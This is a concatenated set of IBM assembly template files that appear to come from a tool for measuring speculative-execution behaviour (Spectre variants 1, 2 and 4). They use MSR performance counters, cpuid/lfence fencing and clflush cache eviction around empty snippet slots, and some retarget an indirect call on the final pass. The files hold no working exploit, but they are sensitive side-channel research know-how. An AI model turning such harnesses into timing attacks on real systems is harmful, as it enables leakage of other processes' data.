32 | ;##### DATA STARTS HERE ########
33 |
34 | ;##### DATA ENDS HERE ########
35 |
36 | section .text
37 | global perf_test_entry:function
38 | global snippet:function ; NOTE(review): no snippet label in this file; confirm this export is needed
39 |
40 | perf_test_entry:
41 |     push rbp
42 |     mov rbp, rsp
43 |     sub rsp, len ; reserve len (8) bytes of stack
44 |
45 |     check_pinning VICTIM_PROCESS ; presumably verifies the run is pinned to CPU VICTIM_PROCESS
46 |     msr_open
47 |     msr_seek
48 | .data: ; loop head: a local code label, not the data section
49 |     mov eax, 0
50 |     cpuid ; serializing instruction ahead of the counted region
51 |     lfence
52 |     reset_counter
53 |     start_counter
54 | ; Snippet slot below: presumably replaced with the INST list of a .json configuration.
55 | ;##### SNIPPET STARTS HERE ######
56 |
57 | ;##### SNIPPET ENDS HERE ######
58 | ;lea rax, [lea_array+rax*2]
59 |
60 | .else: ; nothing in this file jumps to .else
61 |     lfence ; earlier instructions complete before the counter is stopped
62 |     stop_counter
63 |
64 |     inc DWORD[warmup_cnt]
65 |     cmp DWORD[warmup_cnt], 13
66 |     jl .data ; warmup_cnt runs 1..12: twelve passes
67 |
68 |     msr_close
69 |     exit 0
70 |
--------------------------------------------------------------------------------
/examples/v1_various_cond_cycles/v1_nocond_complex_cached_div.asm:
--------------------------------------------------------------------------------
1 | ; Copyright 2021 IBM Corporation
2 | ;
3 | ; Licensed under the Apache License, Version 2.0 (the "License");
4 | ; you may not use this file except in compliance with the License.
5 | ; You may obtain a copy of the License at
6 | ;
7 | ; http://www.apache.org/licenses/LICENSE-2.0
8 | ;
9 | ; Unless required by applicable law or agreed to in writing, software
10 | ; distributed under the License is distributed on an "AS IS" BASIS,
11 | ; WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | ; See the License for the specific language governing permissions and
13 | ; limitations under the License.
14 | ; Harness without the div/cmp/je: the division operands are set up and the snippet slot follows directly; presumably the baseline for v1_cond_complex_cached_div.asm; 12 passes.
15 | [BITS 64]
16 | %include "common.inc"
17 | %include "pmc.inc"
18 | ; check_pinning, msr_*, *_counter and exit are not defined in this file; presumably they come from the two includes above.
19 | section .data
20 | warmup_cnt: db 1 ; with fill: a 64-byte group; read and written as a DWORD, the upper bytes come from fill
21 | fill: times 63 db 0
22 |
23 | warmup_cnt_fake: dw 2 ; doubled after every pass
24 | fill2: times 62 db 0
25 |
26 | divisor: dw 2 ; overwritten with 4096 at the top of every pass; never read in this file
27 | fill3: times 62 db 0
28 |
29 | dev_file: db '/dev/cpu/',VICTIM_PROCESS_STR,'/msr',0 ; MSR device of CPU VICTIM_PROCESS_STR (defined outside this file); on Linux, opening /dev/cpu/N/msr needs the msr driver and elevated privileges
30 | fd: dq 0
31 | val: dq 0
32 | len: equ $-val ; len = 8, the size of val
33 | lea_array: times 40 db 0
34 | junk: db 1
35 | ;##### DATA STARTS HERE ########
36 |
37 | ;##### DATA ENDS HERE ########
38 |
39 | section .text
40 | global perf_test_entry:function
41 | global snippet:function ; NOTE(review): no snippet label in this file; confirm this export is needed
42 |
43 | perf_test_entry:
44 |     push rbp
45 |     mov rbp, rsp
46 |     sub rsp, len ; reserve len (8) bytes of stack
47 |
48 |     check_pinning VICTIM_PROCESS ; presumably verifies the run is pinned to CPU VICTIM_PROCESS
49 |     msr_open
50 |     msr_seek
51 | .data: ; loop head: a local code label, not the data section
52 |     mov eax, 0
53 |     mov DWORD[divisor], 4096 ; 4-byte store: covers divisor and the first two bytes of fill3
54 |     mov r15d, DWORD[warmup_cnt_fake] ; assumes the counter macros leave r15 alone (TODO confirm)
55 |     cpuid ; serializing instruction ahead of the counted region
56 |     lfence
57 |     reset_counter
58 |     start_counter
59 |     xor edx, edx
60 |     mov eax, r15d ; operands are prepared, but no div or branch follows in this variant
61 | ;##### SNIPPET STARTS HERE ######
62 |
63 | ;##### SNIPPET ENDS HERE ######
64 | ;lea rax, [lea_array+rax*2]
65 |
66 | .else: ; nothing in this file jumps to .else
67 |     lfence ; earlier instructions complete before the counter is stopped
68 |     stop_counter
69 |     mov ax, 2 ; NOTE(review): sets only AX; the 32-bit mul below uses all of EAX, so this relies on EAX[31:16] being 0 after stop_counter (confirm)
70 |     mul DWORD[warmup_cnt_fake]
71 |     mov DWORD[warmup_cnt_fake], eax ; warmup_cnt_fake doubles each pass
72 |
73 |     inc DWORD[warmup_cnt]
74 |     cmp DWORD[warmup_cnt], 13
75 |     jl .data ; warmup_cnt runs 1..12: twelve passes
76 |
77 |     msr_close
78 |     exit 0
79 |
--------------------------------------------------------------------------------
/examples/v1_various_cond_cycles/v1_nocond_complex_cached_mul.asm:
--------------------------------------------------------------------------------
1 | ; Copyright 2021 IBM Corporation
2 | ;
3 | ;
Licensed under the Apache License, Version 2.0 (the "License");
; you may not use this file except in compliance with the License.
; You may obtain a copy of the License at
;
;     http://www.apache.org/licenses/LICENSE-2.0
;
; Unless required by applicable law or agreed to in writing, software
; distributed under the License is distributed on an "AS IS" BASIS,
; WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
; See the License for the specific language governing permissions and
; limitations under the License.

[BITS 64]
%include "common.inc"
%include "pmc.inc"

section .data
    ; warmup_cnt is declared as one byte but accessed as a DWORD below; the
    ; zero bytes of `fill` supply the upper bytes (1 + 63 = 64 bytes in total).
    warmup_cnt: db 1
    fill: times 63 db 0

    ; A word followed by 62 zero bytes, accessed as a DWORD below.
    warmup_cnt_fake: dw 4096
    fill2: times 62 db 0

    ; Path of the MSR device for the core named by VICTIM_PROCESS_STR (defined
    ; outside this file). /dev/cpu/N/msr normally requires root.
    dev_file: db '/dev/cpu/',VICTIM_PROCESS_STR,'/msr',0
    fd: dq 0
    val: dq 0
    len: equ $-val                      ; size of val (8 bytes)
    lea_array: times 40 db 0
    junk: db 1
;##### DATA STARTS HERE ########

;##### DATA ENDS HERE ########

section .text
    global perf_test_entry:function
    global snippet:function             ; no `snippet` label is defined in this template as shown

; perf_test_entry: measurement harness. The loop at .data runs while
; warmup_cnt < 13 (12 passes starting from 1). Each pass serialises with
; cpuid + lfence, resets and starts the counters, executes whatever sits
; between the SNIPPET markers, then fences and stops the counters.
; The counter, MSR, pinning and exit macros come from the included files and
; are not visible here.
perf_test_entry:
    push rbp
    mov rbp, rsp
    sub rsp, len

    check_pinning VICTIM_PROCESS
    msr_open
    msr_seek
.data:
    mov eax, 0                          ; cpuid leaf 0; cpuid is used here as a serialising instruction
    cpuid
    lfence
    reset_counter
    start_counter
    mov ax, 2                           ; presumably the multiplier for a mul in the snippet - TODO confirm
;##### SNIPPET STARTS HERE ######

;##### SNIPPET ENDS HERE ######
    ;lea rax, [lea_array+rax*2]

.else:
    lfence                              ; order the counter stop after the snippet
    stop_counter

    ; Halve warmup_cnt_fake for the next pass (edx:eax / 2, edx cleared first).
    mov eax, DWORD[warmup_cnt_fake]
    mov ecx, 2
    xor edx, edx
    div ecx
    mov DWORD[warmup_cnt_fake], eax

    inc DWORD[warmup_cnt]
    cmp DWORD[warmup_cnt], 13
    jl .data

    msr_close
    exit 0

--------------------------------------------------------------------------------
/examples/v1_various_cond_cycles/v1_nocond_complex_register_div.asm:
--------------------------------------------------------------------------------
; 
Copyright 2021 IBM Corporation
;
; Licensed under the Apache License, Version 2.0 (the "License");
; you may not use this file except in compliance with the License.
; You may obtain a copy of the License at
;
;     http://www.apache.org/licenses/LICENSE-2.0
;
; Unless required by applicable law or agreed to in writing, software
; distributed under the License is distributed on an "AS IS" BASIS,
; WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
; See the License for the specific language governing permissions and
; limitations under the License.

[BITS 64]
%include "common.inc"
%include "pmc.inc"

section .data
    ; warmup_cnt is declared as one byte but accessed as a DWORD below; the
    ; zero bytes of `fill` supply the upper bytes (1 + 63 = 64 bytes in total).
    warmup_cnt: db 1
    fill: times 63 db 0

    ; A qword here (the sibling templates use a word); only its low DWORD is
    ; read and written below.
    warmup_cnt_fake: dq 2
    fill2: times 60 db 0

    ; Path of the MSR device for the core named by VICTIM_PROCESS_STR (defined
    ; outside this file). /dev/cpu/N/msr normally requires root.
    dev_file: db '/dev/cpu/',VICTIM_PROCESS_STR,'/msr',0
    fd: dq 0
    val: dq 0
    len: equ $-val                      ; size of val (8 bytes)
    lea_array: times 40 db 0
    junk: db 1
;##### DATA STARTS HERE ########

;##### DATA ENDS HERE ########

section .text
    global perf_test_entry:function
    global snippet:function             ; no `snippet` label is defined in this template as shown

; perf_test_entry: measurement harness. The loop at .data runs while
; warmup_cnt < 13 (12 passes starting from 1). Each pass serialises with
; cpuid + lfence, resets and starts the counters, executes whatever sits
; between the SNIPPET markers, then fences and stops the counters.
; The counter, MSR, pinning and exit macros come from the included files and
; are not visible here.
perf_test_entry:
    push rbp
    mov rbp, rsp
    sub rsp, len

    check_pinning VICTIM_PROCESS
    msr_open
    msr_seek
.data:
    mov eax, 0                          ; cpuid leaf 0; cpuid is used here as a serialising instruction
    mov r15d, DWORD[warmup_cnt_fake]
    mov r14d, 4096                      ; presumably the register divisor for the snippet - TODO confirm
    cpuid
    lfence
    reset_counter
    start_counter
    ; edx:eax = 0:warmup_cnt_fake, presumably the dividend for a div in the snippet.
    xor edx, edx
    mov eax, r15d

;##### SNIPPET STARTS HERE ######

;##### SNIPPET ENDS HERE ######
    ;lea rax, [lea_array+rax*2]

.else:
    lfence                              ; order the counter stop after the snippet
    stop_counter
    ; Double warmup_cnt_fake for the next pass.
    ; NOTE(review): `mov ax, 2` sets only the low 16 bits of eax, while
    ; `mul DWORD` multiplies by all of eax; the upper half is whatever
    ; stop_counter left there - confirm against pmc.inc.
    mov ax, 2
    mul DWORD[warmup_cnt_fake]
    mov DWORD[warmup_cnt_fake], eax

    inc DWORD[warmup_cnt]
    cmp DWORD[warmup_cnt], 13
    jl .data

    msr_close
    exit 0

--------------------------------------------------------------------------------
/examples/v1_various_cond_cycles/v1_nocond_complex_register_mul.asm:
--------------------------------------------------------------------------------
; Copyright 2021 IBM Corporation
;
; Licensed under the Apache License, Version 2.0 (the "License");
; you may not use this file except in compliance with the License.
; You may obtain a copy of the License at
;
;     http://www.apache.org/licenses/LICENSE-2.0
;
; Unless required by applicable law or agreed to in writing, software
; distributed under the License is distributed on an "AS IS" BASIS,
; WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
; See the License for the specific language governing permissions and
; limitations under the License.

[BITS 64]
%include "common.inc"
%include "pmc.inc"

section .data
    ; warmup_cnt is declared as one byte but accessed as a DWORD below; the
    ; zero bytes of `fill` supply the upper bytes (1 + 63 = 64 bytes in total).
    warmup_cnt: db 1
    fill: times 63 db 0

    ; Not referenced by the code shown in this template.
    warmup_cnt_fake: dw 4096
    fill2: times 62 db 0

    ; Path of the MSR device for the core named by VICTIM_PROCESS_STR (defined
    ; outside this file). /dev/cpu/N/msr normally requires root.
    dev_file: db '/dev/cpu/',VICTIM_PROCESS_STR,'/msr',0
    fd: dq 0
    val: dq 0
    len: equ $-val                      ; size of val (8 bytes)
    lea_array: times 40 db 0
    junk: db 1
;##### DATA STARTS HERE ########

;##### DATA ENDS HERE ########

section .text
    global perf_test_entry:function
    global snippet:function             ; no `snippet` label is defined in this template as shown

; perf_test_entry: measurement harness. The loop at .data runs while
; warmup_cnt < 13 (12 passes starting from 1). Each pass serialises with
; cpuid + lfence, resets and starts the counters, executes whatever sits
; between the SNIPPET markers, then fences and stops the counters.
; The counter, MSR, pinning and exit macros come from the included files and
; are not visible here.
perf_test_entry:
    push rbp
    mov rbp, rsp
    sub rsp, len

    check_pinning VICTIM_PROCESS
    msr_open
    msr_seek

    ; r15d carries the per-pass operand in a register instead of memory.
    ; NOTE(review): this relies on the macros inside the loop preserving r15 - confirm.
    mov r15d, 4096
.data:
    mov eax, 0                          ; cpuid leaf 0; cpuid is used here as a serialising instruction
    cpuid
    lfence
    reset_counter
    start_counter
    mov ax, 2                           ; presumably the multiplier for a mul in the snippet - TODO confirm
;##### SNIPPET STARTS HERE ######

;##### SNIPPET ENDS HERE ######
    ;lea rax, [lea_array+rax*2]

.else:
    lfence                              ; order the counter stop after the snippet
    stop_counter

    ; Halve r15d for the next pass (edx:eax / 2, edx cleared first).
    mov eax, r15d
    mov ecx, 2
    xor edx, edx
    div ecx
    mov r15d, eax

    inc DWORD[warmup_cnt]
    cmp DWORD[warmup_cnt], 13
    jl .data

    msr_close
    exit 0
--------------------------------------------------------------------------------
/examples/v1_various_cond_cycles/v1_nocond_complex_uncached_div.asm:
--------------------------------------------------------------------------------
; Copyright 2021 IBM Corporation
;
; Licensed under the Apache License, Version 2.0 (the "License");
; you may not use this file except in compliance with the License.
; You may obtain a copy of the License at
;
;     http://www.apache.org/licenses/LICENSE-2.0
;
; Unless required by applicable law or agreed to in writing, software
; distributed under the License is distributed on an "AS IS" BASIS,
; WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
; See the License for the specific language governing permissions and
; limitations under the License.

[BITS 64]
%include "common.inc"
%include "pmc.inc"

section .data
    ; warmup_cnt is declared as one byte but accessed as a DWORD below; the
    ; zero bytes of `fill` supply the upper bytes (1 + 63 = 64 bytes in total).
    warmup_cnt: db 1
    fill: times 63 db 0

    ; Same layout: a word followed by 62 zero bytes, accessed as a DWORD.
    warmup_cnt_fake: dw 2
    fill2: times 62 db 0

    divisor: dw 2
    fill3: times 62 db 0

    ; Path of the MSR device for the core named by VICTIM_PROCESS_STR (defined
    ; outside this file). /dev/cpu/N/msr normally requires root.
    dev_file: db '/dev/cpu/',VICTIM_PROCESS_STR,'/msr',0
    fd: dq 0
    val: dq 0
    len: equ $-val                      ; size of val (8 bytes)
    lea_array: times 40 db 0
    junk: db 1
;##### DATA STARTS HERE ########

;##### DATA ENDS HERE ########

section .text
    global perf_test_entry:function
    global snippet:function             ; no `snippet` label is defined in this template as shown

; perf_test_entry: measurement harness. The loop at .data runs while
; warmup_cnt < 13 (12 passes starting from 1). Each pass serialises with
; cpuid + lfence, resets and starts the counters, executes whatever sits
; between the SNIPPET markers, then fences and stops the counters.
; The counter, MSR, pinning and exit macros come from the included files and
; are not visible here.
perf_test_entry:
    push rbp
    mov rbp, rsp
    sub rsp, len

    check_pinning VICTIM_PROCESS
    msr_open
    msr_seek
.data:
    mov eax, 0                          ; cpuid leaf 0; cpuid is used here as a serialising instruction
    mov DWORD[divisor], 4096
    mov r15d, DWORD[warmup_cnt_fake]
    clflush [divisor]                   ; evict the line holding `divisor` before the measured region
    cpuid
    lfence
    reset_counter
    start_counter
    ; edx:eax = 0:warmup_cnt_fake, presumably the dividend for a div in the snippet.
    xor edx, edx
    mov eax, r15d

;##### SNIPPET STARTS HERE ######

;##### SNIPPET ENDS HERE ######
    ;lea rax, [lea_array+rax*2]

.else:
    lfence                              ; order the counter stop after the snippet
    stop_counter
    ; Double warmup_cnt_fake for the next pass.
    ; NOTE(review): `mov ax, 2` sets only the low 16 bits of eax, while
    ; `mul DWORD` multiplies by all of eax; the upper half is whatever
    ; stop_counter left there - confirm against pmc.inc.
    mov ax, 2
    mul DWORD[warmup_cnt_fake]
    mov DWORD[warmup_cnt_fake], eax

    inc DWORD[warmup_cnt]
    cmp DWORD[warmup_cnt], 13
    jl .data

    msr_close
    exit 0

--------------------------------------------------------------------------------
/examples/v1_various_cond_cycles/v1_nocond_complex_uncached_mul.asm:
--------------------------------------------------------------------------------
; Copyright 2021 IBM Corporation
;
; Licensed under the Apache License, Version 2.0 (the "License");
; you may not use this file except in compliance with the License.
; You may obtain a copy of the License at
;
;     http://www.apache.org/licenses/LICENSE-2.0
;
; Unless required by applicable law or agreed to in writing, software
; distributed under the License is distributed on an "AS IS" BASIS,
; WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
; See the License for the specific language governing permissions and
; limitations under the License.

[BITS 64]
%include "common.inc"
%include "pmc.inc"

section .data
    ; warmup_cnt is declared as one byte but accessed as a DWORD below; the
    ; zero bytes of `fill` supply the upper bytes (1 + 63 = 64 bytes in total).
    warmup_cnt: db 1
    fill: times 63 db 0

    ; A word followed by 62 zero bytes, accessed as a DWORD below.
    warmup_cnt_fake: dw 4096
    fill2: times 62 db 0

    ; Path of the MSR device for the core named by VICTIM_PROCESS_STR (defined
    ; outside this file). /dev/cpu/N/msr normally requires root.
    dev_file: db '/dev/cpu/',VICTIM_PROCESS_STR,'/msr',0
    fd: dq 0
    val: dq 0
    len: equ $-val                      ; size of val (8 bytes)
    lea_array: times 40 db 0
    junk: db 1
;##### DATA STARTS HERE ########

;##### DATA ENDS HERE ########

section .text
    global perf_test_entry:function
    global snippet:function             ; no `snippet` label is defined in this template as shown

; perf_test_entry: same harness shape as the template above in this listing:
; 12 passes, each fenced with cpuid + lfence before the counters start and
; lfence before they stop. Here the operand line is flushed at the top of
; every pass.
perf_test_entry:
    push rbp
    mov rbp, rsp
    sub rsp, len

    check_pinning VICTIM_PROCESS
    msr_open
    msr_seek
.data:
    clflush [warmup_cnt_fake]           ; evict the line holding warmup_cnt_fake before the measured region
    mov eax, 0                          ; cpuid leaf 0; cpuid is used here as a serialising instruction
    cpuid
    lfence
    reset_counter
    start_counter
    mov ax, 2                           ; presumably the multiplier for a mul in the snippet - TODO confirm
;##### SNIPPET STARTS HERE ######

;##### SNIPPET ENDS HERE ######
    ;lea rax, [lea_array+rax*2]

.else:
    lfence                              ; order the counter stop after the snippet
    stop_counter

    ; Halve warmup_cnt_fake for the next pass (edx:eax / 2, edx cleared first).
    mov eax, DWORD[warmup_cnt_fake]
    mov ecx, 2
    xor edx, edx
    div ecx
    mov DWORD[warmup_cnt_fake], eax

    inc DWORD[warmup_cnt]
    cmp DWORD[warmup_cnt], 13
    jl .data

    msr_close
    exit 0

--------------------------------------------------------------------------------
/examples/v1_various_cond_cycles/v1_nocond_register.asm:
--------------------------------------------------------------------------------
; Copyright 2021 IBM Corporation
;
; Licensed under the Apache License, Version 2.0 (the "License");
; you may not use this file except in compliance with the License.
; You may obtain a copy of the License at
;
;     http://www.apache.org/licenses/LICENSE-2.0
;
; Unless required by applicable law or agreed to in writing, software
; distributed under the License is distributed on an "AS IS" BASIS,
; WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
; See the License for the specific language governing permissions and
; limitations under the License.
[BITS 64]
%include "common.inc"
%include "pmc.inc"

section .data
    ; Not referenced by the code shown here: this variant keeps its loop
    ; counter in r15.
    warmup_cnt: db 1
    fill: times 63 db 0

    warmup_cnt_fake: dw 2
    fill2: times 62 db 0

    ; Path of the MSR device for the core named by VICTIM_PROCESS_STR (defined
    ; outside this file). /dev/cpu/N/msr normally requires root.
    dev_file: db '/dev/cpu/',VICTIM_PROCESS_STR,'/msr',0
    fd: dq 0
    val: dq 0
    len: equ $-val                      ; size of val (8 bytes)
    lea_array: times 40 db 0
    junk: db 1
;##### DATA STARTS HERE ########

;##### DATA ENDS HERE ########

section .text
    global perf_test_entry:function
    global snippet:function             ; no `snippet` label is defined in this template as shown

; perf_test_entry: measurement harness with the loop counter held in r15.
; The loop at .data runs while r15 < 13 (12 passes starting from 1). Each pass
; serialises with cpuid + lfence, resets and starts the counters, executes
; whatever sits between the SNIPPET markers, then fences and stops the
; counters. The counter, MSR, pinning and exit macros come from the included
; files and are not visible here.
perf_test_entry:
    push rbp
    mov rbp, rsp
    sub rsp, len

    check_pinning VICTIM_PROCESS
    msr_open
    msr_seek
    ; NOTE(review): the loop relies on the macros and the snippet preserving r15 - confirm.
    mov r15, 1
.data:
    mov eax, 0                          ; cpuid leaf 0; cpuid is used here as a serialising instruction
    cpuid
    lfence
    reset_counter
    start_counter
;##### SNIPPET STARTS HERE ######

;##### SNIPPET ENDS HERE ######
    ;lea rax, [lea_array+rax*2]

.else:
    lfence                              ; order the counter stop after the snippet
    stop_counter

    inc r15
    cmp r15, 13
    jl .data

    msr_close
    exit 0

--------------------------------------------------------------------------------
/examples/v1_various_cond_cycles/v1_nocond_uncached.asm:
--------------------------------------------------------------------------------
; Copyright 2021 IBM Corporation
;
; Licensed under the Apache License, Version 2.0 (the "License");
; you may not use this file except in compliance with the License.
; You may obtain a copy of the License at
;
;     http://www.apache.org/licenses/LICENSE-2.0
;
; Unless required by applicable law or agreed to in writing, software
; distributed under the License is distributed on an "AS IS" BASIS,
; WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
; See the License for the specific language governing permissions and
; limitations under the License.
[BITS 64]
%include "common.inc"
%include "pmc.inc"

section .data
    ; warmup_cnt is declared as one byte but accessed as a DWORD below; the
    ; zero bytes of `fill` supply the upper bytes (1 + 63 = 64 bytes in total).
    warmup_cnt: db 1
    fill: times 63 db 0

    ; Not referenced by the code shown in this template.
    warmup_cnt_fake: dw 2
    fill2: times 62 db 0

    ; Path of the MSR device for the core named by VICTIM_PROCESS_STR (defined
    ; outside this file). /dev/cpu/N/msr normally requires root.
    dev_file: db '/dev/cpu/',VICTIM_PROCESS_STR,'/msr',0
    fd: dq 0
    val: dq 0
    len: equ $-val                      ; size of val (8 bytes)
    lea_array: times 40 db 0
    junk: db 1
;##### DATA STARTS HERE ########

;##### DATA ENDS HERE ########

section .text
    global perf_test_entry:function
    global snippet:function             ; no `snippet` label is defined in this template as shown

; perf_test_entry: measurement harness. The loop at .data runs while
; warmup_cnt < 13 (12 passes starting from 1). Each pass flushes the line
; holding warmup_cnt, serialises with cpuid + lfence, resets and starts the
; counters, executes whatever sits between the SNIPPET markers, then fences
; and stops the counters. The counter, MSR, pinning and exit macros come from
; the included files and are not visible here.
perf_test_entry:
    push rbp
    mov rbp, rsp
    sub rsp, len

    check_pinning VICTIM_PROCESS
    msr_open
    msr_seek
.data:
    clflush [warmup_cnt]                ; evict the line holding warmup_cnt before the measured region
    mov eax, 0                          ; cpuid leaf 0; cpuid is used here as a serialising instruction
    cpuid
    lfence
    reset_counter
    start_counter
;##### SNIPPET STARTS HERE ######

;##### SNIPPET ENDS HERE ######
    ;lea rax, [lea_array+rax*2]
.else:
    lfence                              ; order the counter stop after the snippet
    stop_counter

    inc DWORD[warmup_cnt]
    cmp DWORD[warmup_cnt], 13
    jl .data

    msr_close
    exit 0

--------------------------------------------------------------------------------
/examples/v2_various_uncond_cycles/v2_uncond_cached.asm:
--------------------------------------------------------------------------------
; Copyright 2021 IBM Corporation
;
; Licensed under the Apache License, Version 2.0 (the "License");
; you may not use this file except in compliance with the License.
; You may obtain a copy of the License at
;
;     http://www.apache.org/licenses/LICENSE-2.0
;
; Unless required by applicable law or agreed to in writing, software
; distributed under the License is distributed on an "AS IS" BASIS,
; WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
; See the License for the specific language governing permissions and
; limitations under the License.
[BITS 64]
%include "common.inc"
%include "pmc.inc"

section .data
    ; warmup_cnt is declared as one byte but accessed as a DWORD below; the
    ; zero bytes of `fill` supply the upper bytes (1 + 63 = 64 bytes in total).
    warmup_cnt: db 1
    fill: times 63 db 0

    warmup_cnt_fake: dw 2
    fill2: times 62 db 0
    address: dq 0                       ; target pointer for the measured indirect call
    address2: dq 0                      ; not referenced by the code shown here
    ; Path of the MSR device for the core named by VICTIM_PROCESS_STR (defined
    ; outside this file). /dev/cpu/N/msr normally requires root.
    dev_file: db '/dev/cpu/',VICTIM_PROCESS_STR,'/msr',0
    fd: dq 0
    val: dq 0
    len: equ $-val                      ; size of val (8 bytes)
    lea_array: times 40 db 0
    junk: db 1
;##### DATA STARTS HERE ########

;##### DATA ENDS HERE ########

section .text
    global perf_test_entry:function
    global func:function
    global func2:function
    global snippet:function             ; no `snippet` label is defined in this file as shown

; perf_test_entry: measures an indirect call through memory whose target
; changes on the final pass. The loop runs while warmup_cnt < 13 (12 passes
; starting from 1). Passes 1-11 store func2 in `address`; pass 12 keeps func,
; so the last measured call goes to a target the previous passes never used.
; The counters are reset before every call, so presumably only the final
; pass's values are the ones reported - confirm against pmc.inc.
; The counter, MSR, pinning and exit macros come from the included files and
; are not visible here.
perf_test_entry:
    push rbp
    mov rbp, rsp
    sub rsp, len

    check_pinning VICTIM_PROCESS
    msr_open
    msr_seek
.data:
    mov eax, 0                          ; cpuid leaf 0; cpuid is used here as a serialising instruction
    cpuid
    lfence
    mov QWORD[address], func
    cmp DWORD[warmup_cnt], 12
    je .start                           ; pass 12: keep func as the target
    mov QWORD[address], func2           ; every other pass: call func2
.start:
    lfence
    reset_counter
    start_counter
    call [address]                      ; `address` was written just above, so it is likely still cached
    stop_counter

    inc DWORD[warmup_cnt]
    cmp DWORD[warmup_cnt], 13
    jl .data

    msr_close
    exit 0

; func and func2 both return with eax = 0; they differ only in address and in
; the instruction used to clear eax.
func:
    xor eax, eax
    ret

func2:
    mov eax, 0
    ret

--------------------------------------------------------------------------------
/examples/v2_various_uncond_cycles/v2_uncond_register.asm:
--------------------------------------------------------------------------------
; Copyright 2021 IBM Corporation
;
; Licensed under the Apache License, Version 2.0 (the "License");
; you may not use this file except in compliance with the License.
; You may obtain a copy of the License at
;
;     http://www.apache.org/licenses/LICENSE-2.0
;
; Unless required by applicable law or agreed to in writing, software
; distributed under the License is distributed on an "AS IS" BASIS,
; WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
; See the License for the specific language governing permissions and
; limitations under the License.

[BITS 64]
%include "common.inc"
%include "pmc.inc"

section .data
    ; warmup_cnt is declared as one byte but accessed as a DWORD below; the
    ; zero bytes of `fill` supply the upper bytes (1 + 63 = 64 bytes in total).
    warmup_cnt: db 1
    fill: times 63 db 0

    warmup_cnt_fake: dw 2
    fill2: times 62 db 0

    ; Path of the MSR device for the core named by VICTIM_PROCESS_STR (defined
    ; outside this file). /dev/cpu/N/msr normally requires root.
    dev_file: db '/dev/cpu/',VICTIM_PROCESS_STR,'/msr',0
    fd: dq 0
    val: dq 0
    len: equ $-val                      ; size of val (8 bytes)
    lea_array: times 40 db 0
    junk: db 1
;##### DATA STARTS HERE ########

;##### DATA ENDS HERE ########

section .text
    global perf_test_entry:function
    global func:function
    global func2:function
    global snippet:function             ; no `snippet` label is defined in this file as shown

; perf_test_entry: measures an indirect call through a register whose target
; changes on the final pass. The loop runs while warmup_cnt < 13 (12 passes
; starting from 1). Passes 1-11 load func2 into r15; pass 12 keeps func, so
; the last measured call goes to a target the previous passes never used.
; The counter, MSR, pinning and exit macros come from the included files and
; are not visible here.
perf_test_entry:
    push rbp
    mov rbp, rsp
    sub rsp, len

    check_pinning VICTIM_PROCESS
    msr_open
    msr_seek
.data:
    mov eax, 0                          ; cpuid leaf 0; cpuid is used here as a serialising instruction
    cpuid
    lfence
    mov r15, func
    cmp DWORD[warmup_cnt], 12
    je .start                           ; pass 12: keep func as the target
    mov r15, func2                      ; every other pass: call func2
.start:
    lfence
    ; NOTE(review): relies on reset_counter/start_counter preserving r15 - confirm.
    reset_counter
    start_counter
    call r15
    stop_counter

    inc DWORD[warmup_cnt]
    cmp DWORD[warmup_cnt], 13
    jl .data

    msr_close
    exit 0

; func and func2 both return with eax = 0; they differ only in address and in
; the instruction used to clear eax.
func:
    xor eax, eax
    ret

func2:
    mov eax, 0
    ret

--------------------------------------------------------------------------------
/examples/v2_various_uncond_cycles/v2_uncond_uncached.asm:
--------------------------------------------------------------------------------
; Copyright 2021 IBM Corporation
;
; Licensed under the Apache License, Version 2.0 (the "License");
; you may not use this file except in compliance with the License.
; You may obtain a copy of the License at
;
;     http://www.apache.org/licenses/LICENSE-2.0
;
; Unless required by applicable law or agreed to in writing, software
; distributed under the License is distributed on an "AS IS" BASIS,
; WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
; See the License for the specific language governing permissions and
; limitations under the License.

[BITS 64]
%include "common.inc"
%include "pmc.inc"

section .data
    ; warmup_cnt is declared as one byte but accessed as a DWORD below; the
    ; zero bytes of `fill` supply the upper bytes (1 + 63 = 64 bytes in total).
    warmup_cnt: db 1
    fill: times 63 db 0

    warmup_cnt_fake: dw 2
    fill2: times 62 db 0
    address: dq 0                       ; target pointer for the measured indirect call
    address2: dq 0                      ; not referenced by the code shown here
    ; Path of the MSR device for the core named by VICTIM_PROCESS_STR (defined
    ; outside this file). /dev/cpu/N/msr normally requires root.
    dev_file: db '/dev/cpu/',VICTIM_PROCESS_STR,'/msr',0
    fd: dq 0
    val: dq 0
    len: equ $-val                      ; size of val (8 bytes)
    lea_array: times 40 db 0
    junk: db 1
;##### DATA STARTS HERE ########

;##### DATA ENDS HERE ########

section .text
    global perf_test_entry:function
    global func:function
    global func2:function
    global snippet:function             ; no `snippet` label is defined in this file as shown

; perf_test_entry: measures an indirect call through memory whose target
; changes on the final pass and whose pointer is flushed from the cache first.
; The loop runs while warmup_cnt < 13 (12 passes starting from 1). Passes 1-11
; store func2 in `address`; pass 12 keeps func. The counter, MSR, pinning and
; exit macros come from the included files and are not visible here.
perf_test_entry:
    push rbp
    mov rbp, rsp
    sub rsp, len

    check_pinning VICTIM_PROCESS
    msr_open
    msr_seek
.data:
    mov eax, 0                          ; cpuid leaf 0; cpuid is used here as a serialising instruction
    cpuid
    lfence
    mov QWORD[address], func
    cmp DWORD[warmup_cnt], 12
    je .start                           ; pass 12: keep func as the target
    mov QWORD[address], func2           ; every other pass: call func2
.start:
    lfence
    clflush [address]                   ; evict the pointer so the call has to fetch its target from memory
    lfence
    reset_counter
    start_counter
    call [address]
    stop_counter

    inc DWORD[warmup_cnt]
    cmp DWORD[warmup_cnt], 13
    jl .data

    msr_close
    exit 0

; func and func2 both return with eax = 0; they differ only in address and in
; the instruction used to clear eax.
func:
    xor eax, eax
    ret

func2:
    mov eax, 0
    ret

--------------------------------------------------------------------------------
/examples/v4_cycles/v4_cycles.asm:
--------------------------------------------------------------------------------
; Copyright 2021 IBM Corporation
;
